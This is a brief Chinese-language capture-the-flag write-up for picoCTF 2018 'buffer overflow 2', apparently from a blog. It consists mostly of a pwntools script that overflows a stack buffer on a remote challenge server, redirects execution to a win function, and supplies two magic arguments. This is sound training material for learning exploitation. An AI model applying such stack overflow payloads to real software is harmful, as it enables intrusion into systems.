picoctf_2018_buffer overflow 2
记住给一个返回地址

一个溢出点溢出到这个函数,然后给两个参数直接给就好
点击查看代码
from pwn import *
io=remote("node4.buuoj.cn",29294)
io.recvuntil("Please enter your string: ")
payload='a'*(0x6c+0x4)+p32(0x80485CB)+'aaaa'+p32(0xDEADBEEF)+p32(0xDEADC0DE)
io.sendline(payload)
io.interactive()

浙公网安备 33010602011771号